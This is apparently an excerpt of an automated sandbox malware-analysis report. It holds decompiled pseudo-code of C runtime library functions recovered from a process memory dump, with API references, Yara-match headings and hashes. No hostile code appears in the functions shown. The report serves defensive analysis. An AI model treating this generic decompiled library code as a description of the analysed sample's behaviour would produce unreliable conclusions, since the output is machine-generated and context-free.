                                                                    0x004228c5
                                                                    0x004228c8
                                                                    0x004228c9
                                                                    0x004228d1
                                                                    0x004228d6
                                                                    0x004228da
                                                                    0x004228dd
                                                                    0x004228e0
                                                                    0x004228e3
                                                                    0x004228e6
                                                                    0x004228e7
                                                                    0x004228ea
                                                                    0x004228f4
                                                                    0x004228f8
                                                                    0x00000000
                                                                    0x004228f8
                                                                    0x004228fe

                                                                    APIs
                                                                    • ___BuildCatchObject.LIBCMT ref: 004228A4
                                                                      • Part of subcall function 004227FF: ___BuildCatchObjectHelper.LIBCMT ref: 00422835
                                                                    • _UnwindNestedFrames.LIBCMT ref: 004228BB
                                                                    • ___FrameUnwindToState.LIBCMT ref: 004228C9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                    • String ID: bad exception
                                                                    • API String ID: 2163707966-3837556057
                                                                    • Opcode ID: f39fb36694f02701e894e140306c736bfed23daeba737eff67630f948297a0e7
                                                                    • Instruction ID: e1e3094c7b54488b2a47325b3feb8f06a39c563c995722febe1ce7b31812a6e7
                                                                    • Opcode Fuzzy Hash: f39fb36694f02701e894e140306c736bfed23daeba737eff67630f948297a0e7
                                                                    • Instruction Fuzzy Hash: 78014F31100119BBDF126F51ED45EAB3F65FF08344F804016BD0815121DBBAD971DBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004188BC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E004188BC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t34;
				intOrPtr* _t38;
				intOrPtr _t40;
				void* _t41;
				void* _t42;

				_t42 = __eflags;
				_push(4);
				E00420808(E004337FA, __ebx, __edi, __esi);
				_t40 =  *((intOrPtr*)(_t41 + 8));
				_t38 = E0041FD3A(__edi, _t40, _t42);
				 *((intOrPtr*)(_t40 + 8)) = 0;
				 *((intOrPtr*)(_t40 + 0x10)) = 0;
				 *((intOrPtr*)(_t40 + 0x14)) = 0;
				 *((intOrPtr*)(_t41 - 4)) = 0;
				E0041D990();
				 *((intOrPtr*)(_t40 + 8)) = E00418971(0x43c8d8);
				E0041D990();
				 *((intOrPtr*)(_t40 + 0x10)) = E00418971("false");
				E0041D990();
				 *((intOrPtr*)(_t40 + 0x14)) = E00418971("true");
				E0041D990();
				 *((char*)(_t40 + 0xc)) =  *((intOrPtr*)( *_t38));
				E0041D990();
				 *((char*)(_t40 + 0xd)) =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 4))));
				E0041D990();
				 *((char*)(_t40 + 0xc)) = 0x2e;
				_t34 = E0041D990();
				 *((char*)(_t40 + 0xd)) = 0x2c;
				return E00420874(_t34);
			}








                                                                    0x004188bc
                                                                    0x004188bc
                                                                    0x004188c3
                                                                    0x004188c8
                                                                    0x004188d0
                                                                    0x004188d4
                                                                    0x004188d7
                                                                    0x004188da
                                                                    0x004188dd
                                                                    0x004188e0
                                                                    0x004188ef
                                                                    0x004188f2
                                                                    0x00418901
                                                                    0x00418904
                                                                    0x00418913
                                                                    0x00418916
                                                                    0x0041891f
                                                                    0x00418922
                                                                    0x0041892c
                                                                    0x0041892f
                                                                    0x00418934
                                                                    0x00418938
                                                                    0x0041893d
                                                                    0x00418946

                                                                    APIs
                                                                    • __EH_prolog3_catch.LIBCMT ref: 004188C3
                                                                    • _localeconv.LIBCMT ref: 004188CB
                                                                      • Part of subcall function 0041FD3A: __getptd.LIBCMT ref: 0041FD3A
                                                                      • Part of subcall function 0041D990: ____lc_handle_func.LIBCMT ref: 0041D993
                                                                      • Part of subcall function 0041D990: ____lc_codepage_func.LIBCMT ref: 0041D99B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3_catch____lc_codepage_func____lc_handle_func__getptd_localeconv
                                                                    • String ID: false$true
                                                                    • API String ID: 2930029256-2658103896
                                                                    • Opcode ID: 0a5b60a25ca465a798fa03fa125a80a22b941d877fde70480af1cfa6286f290e
                                                                    • Instruction ID: fa5c6af2f701fda4367daf7c7d19c63fc8195d7845aaf5598709bb43565b0c88
                                                                    • Opcode Fuzzy Hash: 0a5b60a25ca465a798fa03fa125a80a22b941d877fde70480af1cfa6286f290e
                                                                    • Instruction Fuzzy Hash: C8010CF4D15B508FC714BF7A800625A7BE0AF05348B04DC6FE0E98B612DB3CD5848BAA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041F8F4 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 96%
                                                                    			E0041F8F4(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t56;
				signed int _t60;
				void* _t65;
				signed int _t66;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t79;
				signed int _t81;
				signed int _t85;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				intOrPtr* _t96;
				void* _t97;

				_t92 = _a8;
				if(_t92 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t96 = _a16;
					_t100 = _t96;
					if(_t96 != 0) {
						_t79 = _a4;
						__eflags = _t79;
						if(__eflags == 0) {
							goto L3;
						}
						_t60 = _t56 | 0xffffffff;
						_t88 = _t60 % _t92;
						__eflags = _a12 - _t60 / _t92;
						if(__eflags > 0) {
							goto L3;
						}
						_t93 = _t92 * _a12;
						__eflags =  *(_t96 + 0xc) & 0x0000010c;
						_v8 = _t79;
						_v16 = _t93;
						_t78 = _t93;
						if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t96 + 0x18);
						}
						__eflags = _t93;
						if(_t93 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t81 =  *(_t96 + 0xc) & 0x00000108;
								__eflags = _t81;
								if(_t81 == 0) {
									L18:
									__eflags = _t78 - _v12;
									if(_t78 < _v12) {
										_t65 = E0042371D(_t88, _t93,  *_v8, _t96);
										__eflags = _t65 - 0xffffffff;
										if(_t65 == 0xffffffff) {
											L34:
											_t66 = _t93;
											L35:
											return (_t66 - _t78) / _a8;
										}
										_v8 = _v8 + 1;
										_t69 =  *(_t96 + 0x18);
										_t78 = _t78 - 1;
										_v12 = _t69;
										__eflags = _t69;
										if(_t69 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t81;
									if(_t81 == 0) {
										L21:
										__eflags = _v12;
										_t94 = _t78;
										if(_v12 != 0) {
											_t72 = _t78;
											_t88 = _t72 % _v12;
											_t94 = _t94 - _t72 % _v12;
											__eflags = _t94;
										}
										_push(_t94);
										_push(_v8);
										_push(E0042779D(_t96));
										_t71 = E00428678(_t78, _t88, _t94, _t96, __eflags);
										_t97 = _t97 + 0xc;
										__eflags = _t71 - 0xffffffff;
										if(_t71 == 0xffffffff) {
											L36:
											 *(_t96 + 0xc) =  *(_t96 + 0xc) | 0x00000020;
											_t66 = _v16;
											goto L35;
										} else {
											_t85 = _t94;
											__eflags = _t71 - _t94;
											if(_t71 <= _t94) {
												_t85 = _t71;
											}
											_v8 = _v8 + _t85;
											_t78 = _t78 - _t85;
											__eflags = _t71 - _t94;
											if(_t71 < _t94) {
												goto L36;
											} else {
												L27:
												_t93 = _v16;
												goto L31;
											}
										}
									}
									_t74 = E0041F474(_t88, _t96);
									__eflags = _t74;
									if(_t74 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t75 =  *(_t96 + 4);
								__eflags = _t75;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t45 = _t96 + 0xc;
									 *_t45 =  *(_t96 + 0xc) | 0x00000020;
									__eflags =  *_t45;
									goto L34;
								}
								_t95 = _t78;
								__eflags = _t78 - _t75;
								if(_t78 >= _t75) {
									_t95 = _t75;
								}
								E00420090( *_t96, _v8, _t95);
								 *(_t96 + 4) =  *(_t96 + 4) - _t95;
								 *_t96 =  *_t96 + _t95;
								_t97 = _t97 + 0xc;
								_t78 = _t78 - _t95;
								_v8 = _v8 + _t95;
								goto L27;
								L31:
								__eflags = _t78;
							} while (_t78 != 0);
							goto L32;
						}
					}
					L3:
					 *((intOrPtr*)(E00422147(_t100))) = 0x16;
					E00423A0B();
					goto L4;
				}
			}





























                                                                    0x0041f8ff
                                                                    0x0041f904
                                                                    0x0041f923
                                                                    0x00000000
                                                                    0x0041f90c
                                                                    0x0041f90c
                                                                    0x0041f90f
                                                                    0x0041f911
                                                                    0x0041f92a
                                                                    0x0041f92d
                                                                    0x0041f92f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041f931
                                                                    0x0041f936
                                                                    0x0041f938
                                                                    0x0041f93b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041f93d
                                                                    0x0041f941
                                                                    0x0041f948
                                                                    0x0041f94b
                                                                    0x0041f94e
                                                                    0x0041f950
                                                                    0x0041f95a
                                                                    0x0041f952
                                                                    0x0041f955
                                                                    0x0041f955
                                                                    0x0041f961
                                                                    0x0041f963
                                                                    0x0041fa28
                                                                    0x00000000
                                                                    0x0041f969
                                                                    0x0041f969
                                                                    0x0041f96c
                                                                    0x0041f96c
                                                                    0x0041f972
                                                                    0x0041f9a3
                                                                    0x0041f9a3
                                                                    0x0041f9a6
                                                                    0x0041f9ff
                                                                    0x0041fa06
                                                                    0x0041fa09
                                                                    0x0041fa34
                                                                    0x0041fa34
                                                                    0x0041fa36
                                                                    0x00000000
                                                                    0x0041fa3a
                                                                    0x0041fa0b
                                                                    0x0041fa0e
                                                                    0x0041fa11
                                                                    0x0041fa12
                                                                    0x0041fa15
                                                                    0x0041fa17
                                                                    0x0041fa19
                                                                    0x0041fa19
                                                                    0x00000000
                                                                    0x0041fa17
                                                                    0x0041f9a8
                                                                    0x0041f9aa
                                                                    0x0041f9b7
                                                                    0x0041f9b7
                                                                    0x0041f9bb
                                                                    0x0041f9bd
                                                                    0x0041f9c1
                                                                    0x0041f9c3
                                                                    0x0041f9c6
                                                                    0x0041f9c6
                                                                    0x0041f9c6
                                                                    0x0041f9c8
                                                                    0x0041f9c9
                                                                    0x0041f9d3
                                                                    0x0041f9d4
                                                                    0x0041f9d9
                                                                    0x0041f9dc
                                                                    0x0041f9df
                                                                    0x0041fa42
                                                                    0x0041fa42
                                                                    0x0041fa46
                                                                    0x00000000
                                                                    0x0041f9e1
                                                                    0x0041f9e1
                                                                    0x0041f9e3
                                                                    0x0041f9e5
                                                                    0x0041f9e7
                                                                    0x0041f9e7
                                                                    0x0041f9e9
                                                                    0x0041f9ec
                                                                    0x0041f9ee
                                                                    0x0041f9f0
                                                                    0x00000000
                                                                    0x0041f9f2
                                                                    0x0041f9f2
                                                                    0x0041f9f2
                                                                    0x00000000
                                                                    0x0041f9f2
                                                                    0x0041f9f0
                                                                    0x0041f9df
                                                                    0x0041f9ad
                                                                    0x0041f9b3
                                                                    0x0041f9b5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041f9b5
                                                                    0x0041f974
                                                                    0x0041f977
                                                                    0x0041f979
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041f97b
                                                                    0x0041fa30
                                                                    0x0041fa30
                                                                    0x0041fa30
                                                                    0x00000000
                                                                    0x0041fa30
                                                                    0x0041f981
                                                                    0x0041f983
                                                                    0x0041f985
                                                                    0x0041f987
                                                                    0x0041f987
                                                                    0x0041f98f
                                                                    0x0041f994
                                                                    0x0041f997
                                                                    0x0041f999
                                                                    0x0041f99c
                                                                    0x0041f99e
                                                                    0x00000000
                                                                    0x0041fa20
                                                                    0x0041fa20
                                                                    0x0041fa20
                                                                    0x00000000
                                                                    0x0041f969
                                                                    0x0041f963
                                                                    0x0041f913
                                                                    0x0041f918
                                                                    0x0041f91e
                                                                    0x00000000
                                                                    0x0041f91e

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                    • String ID:
                                                                    • API String ID: 2782032738-0
                                                                    • Opcode ID: cfe6b5ca2a59a5fae31735a707af07ff3020201040149e664561602bab7f2bc6
                                                                    • Instruction ID: cc03f274c396bd690d001866507c77ffe73d28f18c5a8b3c723fdac4fe4beabc
                                                                    • Opcode Fuzzy Hash: cfe6b5ca2a59a5fae31735a707af07ff3020201040149e664561602bab7f2bc6
                                                                    • Instruction Fuzzy Hash: 8041B471B10604ABDB249FA59444BEFBBB5AF80364F24813FE45997240D77CDE8B8B48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042E73C Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0042E73C(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E0041E2CD( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00428AD8( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00422147(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0x50036ad0
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0x50036ad0
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t26 = _t56 + 0xac; // 0x50036ad0
								_t57 =  *_t26;
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                    0x0042e746
                                                                    0x0042e74d
                                                                    0x0042e764
                                                                    0x00000000
                                                                    0x0042e754
                                                                    0x0042e756
                                                                    0x0042e770
                                                                    0x0042e775
                                                                    0x0042e778
                                                                    0x0042e77b
                                                                    0x0042e7a3
                                                                    0x0042e7aa
                                                                    0x0042e7ac
                                                                    0x0042e82d
                                                                    0x0042e83f
                                                                    0x0042e848
                                                                    0x0042e84a
                                                                    0x0042e78a
                                                                    0x0042e78a
                                                                    0x0042e78d
                                                                    0x0042e78f
                                                                    0x0042e792
                                                                    0x0042e792
                                                                    0x0042e792
                                                                    0x0042e792
                                                                    0x00000000
                                                                    0x0042e798
                                                                    0x0042e80c
                                                                    0x0042e80c
                                                                    0x0042e811
                                                                    0x0042e817
                                                                    0x0042e81a
                                                                    0x0042e81c
                                                                    0x0042e81f
                                                                    0x0042e81f
                                                                    0x0042e81f
                                                                    0x0042e81f
                                                                    0x00000000
                                                                    0x0042e823
                                                                    0x0042e7ae
                                                                    0x0042e7b1
                                                                    0x0042e7b1
                                                                    0x0042e7b7
                                                                    0x0042e7ba
                                                                    0x0042e7e1
                                                                    0x0042e7e4
                                                                    0x0042e7e4
                                                                    0x0042e7ea
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042e7ec
                                                                    0x0042e7ef
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042e7f1
                                                                    0x0042e7f1
                                                                    0x0042e7f1
                                                                    0x0042e7f7
                                                                    0x0042e7fa
                                                                    0x0042e769
                                                                    0x0042e769
                                                                    0x0042e803
                                                                    0x00000000
                                                                    0x0042e803
                                                                    0x0042e7bc
                                                                    0x0042e7bf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042e7c3
                                                                    0x0042e7d1
                                                                    0x0042e7d4
                                                                    0x0042e7da
                                                                    0x0042e7dc
                                                                    0x0042e7df
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042e7df
                                                                    0x0042e77d
                                                                    0x0042e780
                                                                    0x0042e782
                                                                    0x0042e787
                                                                    0x0042e787
                                                                    0x00000000
                                                                    0x0042e758
                                                                    0x0042e758
                                                                    0x0042e75d
                                                                    0x0042e761
                                                                    0x0042e761
                                                                    0x00000000
                                                                    0x0042e75d
                                                                    0x0042e756

                                                                    APIs
                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042E770
                                                                    • __isleadbyte_l.LIBCMT ref: 0042E7A3
                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,0042F3A9,00000109,00BFBBEF,00000003), ref: 0042E7D4
                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,0042F3A9,00000109,00BFBBEF,00000003), ref: 0042E842
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                    • String ID:
                                                                    • API String ID: 3058430110-0
                                                                    • Opcode ID: 8a2bb5608311336e6c8ec775829e184352da7f620ccbfd51da06a2c657c9639f
                                                                    • Instruction ID: c8928aa50c0add6015665f216cfe189acaea097098f2a01941b8ade04c710929
                                                                    • Opcode Fuzzy Hash: 8a2bb5608311336e6c8ec775829e184352da7f620ccbfd51da06a2c657c9639f
                                                                    • Instruction Fuzzy Hash: 3F31F230B00266EFCB20EFA6E8849BA3BB5FF41314F94856AF4518B291E734DD41DB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041D711 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E0041D711(signed int _a4, signed int _a8, signed int _a9, char _a10) {
				signed char _v7;
				signed char _v8;
				signed char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				intOrPtr _t42;
				signed int _t47;
				signed int _t51;
				signed int _t52;
				intOrPtr _t57;
				signed int _t59;
				signed int _t64;
				void* _t72;
				void* _t73;
				signed int _t76;

				_t76 = _a8;
				_t79 = _t76;
				if(_t76 != 0) {
					_v16 =  *_t76;
					_t42 =  *((intOrPtr*)(_t76 + 4));
				} else {
					_v16 =  *((intOrPtr*)(E00421FAE(_t72, _t73, _t76, _t79) + 8));
					_t42 = E00421F88(_t72, _t73, _t76, _t79);
				}
				_v20 = _t42;
				if(_v16 != 0) {
					_t64 = _a4;
					_push(_t73);
					__eflags = _t64 - 0x100;
					if(_t64 >= 0x100) {
						L11:
						__eflags = _t76;
						if(__eflags != 0) {
							_v12 = _t64;
							_v12 = _v12 >> 8;
							_t47 =  *( *((intOrPtr*)(_t76 + 8)) + (_v12 & 0x000000ff) * 2) >> 0x0000000f & 0x00000001;
							__eflags = _t47;
							L14:
							__eflags = _t47;
							if(__eflags == 0) {
								_a8 = _t64;
								_a9 = 0;
								__eflags = 1;
							} else {
								_push(2);
								_a8 = _v12;
								_a9 = _t64;
								_a10 = 0;
								_pop(1);
							}
							_t51 = E004219F5(0x100, __eflags, 0, _v16, 0x100,  &_a8, 1,  &_v8, 3, _v20, 1);
							__eflags = _t51;
							if(_t51 != 0) {
								__eflags = _t51 - 1;
								_t52 = _v8 & 0x000000ff;
								if(_t51 != 1) {
									_t52 = _t52 << 0x00000008 | _v7 & 0x000000ff;
									__eflags = _t52;
								}
								goto L21;
							} else {
								L18:
								_t52 = _t64;
								L21:
								return _t52;
							}
						}
						L12:
						_v12 = _t64;
						_v12 = _v12 >> 8;
						_t47 =  *(E00421A3B(_t72, 0x100, _t76, __eflags) + (_v12 & 0x000000ff) * 2) & 0x8000;
						goto L14;
					}
					__eflags = _t76;
					if(_t76 != 0) {
						_t57 =  *((intOrPtr*)(_t76 + 8));
						__eflags =  *(_t57 + _t64 * 2) & 0x00000001;
						if(( *(_t57 + _t64 * 2) & 0x00000001) == 0) {
							goto L18;
						}
						goto L11;
					}
					__eflags = E00421AB5(_t64);
					if(__eflags != 0) {
						goto L12;
					}
					goto L18;
				} else {
					_t59 = _a4;
					if(_t59 - 0x41 > 0x19) {
						return _t59;
					}
					return _t59 + 0x20;
				}
			}




















                                                                    0x0041d71a
                                                                    0x0041d71d
                                                                    0x0041d71f
                                                                    0x0041d735
                                                                    0x0041d738
                                                                    0x0041d721
                                                                    0x0041d729
                                                                    0x0041d72c
                                                                    0x0041d72c
                                                                    0x0041d73f
                                                                    0x0041d742
                                                                    0x0041d75c
                                                                    0x0041d75f
                                                                    0x0041d765
                                                                    0x0041d767
                                                                    0x0041d786
                                                                    0x0041d786
                                                                    0x0041d788
                                                                    0x0041d7a8
                                                                    0x0041d7ab
                                                                    0x0041d7be
                                                                    0x0041d7be
                                                                    0x0041d7c1
                                                                    0x0041d7c1
                                                                    0x0041d7c3
                                                                    0x0041d7d9
                                                                    0x0041d7dc
                                                                    0x0041d7e0
                                                                    0x0041d7c5
                                                                    0x0041d7c8
                                                                    0x0041d7ca
                                                                    0x0041d7cd
                                                                    0x0041d7d0
                                                                    0x0041d7d4
                                                                    0x0041d7d4
                                                                    0x0041d7f7
                                                                    0x0041d7ff
                                                                    0x0041d801
                                                                    0x0041d807
                                                                    0x0041d80a
                                                                    0x0041d80e
                                                                    0x0041d817
                                                                    0x0041d817
                                                                    0x0041d817
                                                                    0x00000000
                                                                    0x0041d803
                                                                    0x0041d803
                                                                    0x0041d803
                                                                    0x0041d819
                                                                    0x00000000
                                                                    0x0041d81a
                                                                    0x0041d801
                                                                    0x0041d78a
                                                                    0x0041d78a
                                                                    0x0041d78d
                                                                    0x0041d79e
                                                                    0x00000000
                                                                    0x0041d79e
                                                                    0x0041d769
                                                                    0x0041d76b
                                                                    0x0041d77d
                                                                    0x0041d780
                                                                    0x0041d784
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041d784
                                                                    0x0041d774
                                                                    0x0041d776
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041d744
                                                                    0x0041d744
                                                                    0x0041d74d
                                                                    0x0041d81d
                                                                    0x0041d81d
                                                                    0x00000000
                                                                    0x0041d753

                                                                    APIs
                                                                    • ____lc_handle_func.LIBCMT ref: 0041D721
                                                                      • Part of subcall function 00421FAE: __getptd.LIBCMT ref: 00421FAE
                                                                    • ____lc_codepage_func.LIBCMT ref: 0041D72C
                                                                      • Part of subcall function 00421F88: __getptd.LIBCMT ref: 00421F88
                                                                    • ___pctype_func.LIBCMT ref: 0041D791
                                                                    • ___crtLCMapStringA.LIBCMT ref: 0041D7F7
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __getptd$String____lc_codepage_func____lc_handle_func___crt___pctype_func
                                                                    • String ID:
                                                                    • API String ID: 3477544643-0
                                                                    • Opcode ID: df148876388ef54b50e1d1421a45f63fdd8ca2894a1057773d7dd2176c7ea29c
                                                                    • Instruction ID: 8c50663dd6643fa2ceec474a75a86dd31631e70e8d9f9de589f6722549c71921
                                                                    • Opcode Fuzzy Hash: df148876388ef54b50e1d1421a45f63fdd8ca2894a1057773d7dd2176c7ea29c
                                                                    • Instruction Fuzzy Hash: 1C3108B1E04255AEDB219F59C881BEE7BB4AF21304F18805BE875DB291D37CDAC1CB25
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041C21B Relevance: 6.1, APIs: 4, Instructions: 98timeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 92%
                                                                    			E0041C21B(intOrPtr __ebx, void* _a4, void _a8) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				signed short _v28;
				signed short _v32;
				void* _v36;
				struct _FILETIME _v44;
				void* __edi;
				void* __esi;
				signed int _t42;
				void* _t44;
				void _t48;
				intOrPtr _t54;
				intOrPtr _t62;
				signed int _t65;
				signed int _t71;

				_t62 = __ebx;
				_t42 =  *0x443674; // 0x393162b1
				_v8 = _t42 ^ _t71;
				_t44 = _a4;
				_t69 = 0;
				_t70 = __ebx + 0x70;
				_v36 = _t44;
				 *(__ebx + 0x7c) = 0;
				 *((intOrPtr*)(__ebx + 0x84)) = 0;
				 *((char*)(__ebx + 0x80)) = 0;
				 *((intOrPtr*)(__ebx + 0x78)) = 0;
				 *_t70 = 0;
				 *((intOrPtr*)(__ebx + 0x90)) = 0;
				 *((intOrPtr*)(__ebx + 0x74)) = 0;
				if(_t44 == 0 || _t44 == 0xffffffff) {
					_t45 = 0x10000;
				} else {
					if(SetFilePointer( *(__ebx + 4), 0, 0, 1) == 0xffffffff) {
						_t48 = _a8;
						 *_t70 =  *_t70 | 0xffffffff;
						 *((intOrPtr*)(__ebx + 0x4c)) = 0x80000000;
						if(_t48 != 0) {
							 *_t70 = _t48;
						}
						 *((char*)(_t62 + 0x6c)) = 0;
						GetLocalTime( &_v24);
						SystemTimeToFileTime( &_v24,  &_v44);
						_push(_v44.dwHighDateTime);
						_t69 =  &_v28;
						_t70 =  &_v32;
						E0041BD4E( &_v28,  &_v32, _v44.dwLowDateTime);
						_t54 = E0041BD2C(_v44.dwLowDateTime, _v44.dwHighDateTime);
						 *((intOrPtr*)(_t62 + 0x50)) = _t54;
						 *((intOrPtr*)(_t62 + 0x58)) = _t54;
						 *((intOrPtr*)(_t62 + 0x60)) = _t54;
						_t65 = _t68;
						 *((intOrPtr*)(_t62 + 0x5c)) = _t65;
						 *((intOrPtr*)(_t62 + 0x64)) = _t65;
						 *(_t62 + 0x68) = (_v32 & 0x0000ffff) << 0x00000010 | _v28 & 0x0000ffff;
						 *((intOrPtr*)(_t62 + 0x54)) = _t68;
						 *((intOrPtr*)(_t62 + 0x7c)) = _v36;
						goto L5;
					} else {
						_t70 = _v36;
						_t68 = __ebx + 0x50;
						if(E0041BDB5(_t70, __ebx + 0x50, __ebx + 0x4c, _t70, __ebx + 0x68) == 0) {
							SetFilePointer(_t70, 0, 0, 0);
							 *((char*)(__ebx + 0x6c)) = 1;
							 *(__ebx + 0x7c) = _t70;
							L5:
							_t45 = 0;
						}
					}
				}
				return E0041DA9B(_t45, _t62, _v8 ^ _t71, _t68, _t69, _t70);
			}


















                                                                    0x0041c21b
                                                                    0x0041c221
                                                                    0x0041c228
                                                                    0x0041c22b
                                                                    0x0041c230
                                                                    0x0041c232
                                                                    0x0041c235
                                                                    0x0041c238
                                                                    0x0041c23b
                                                                    0x0041c241
                                                                    0x0041c248
                                                                    0x0041c24b
                                                                    0x0041c24d
                                                                    0x0041c253
                                                                    0x0041c258
                                                                    0x0041c329
                                                                    0x0041c267
                                                                    0x0041c277
                                                                    0x0041c2af
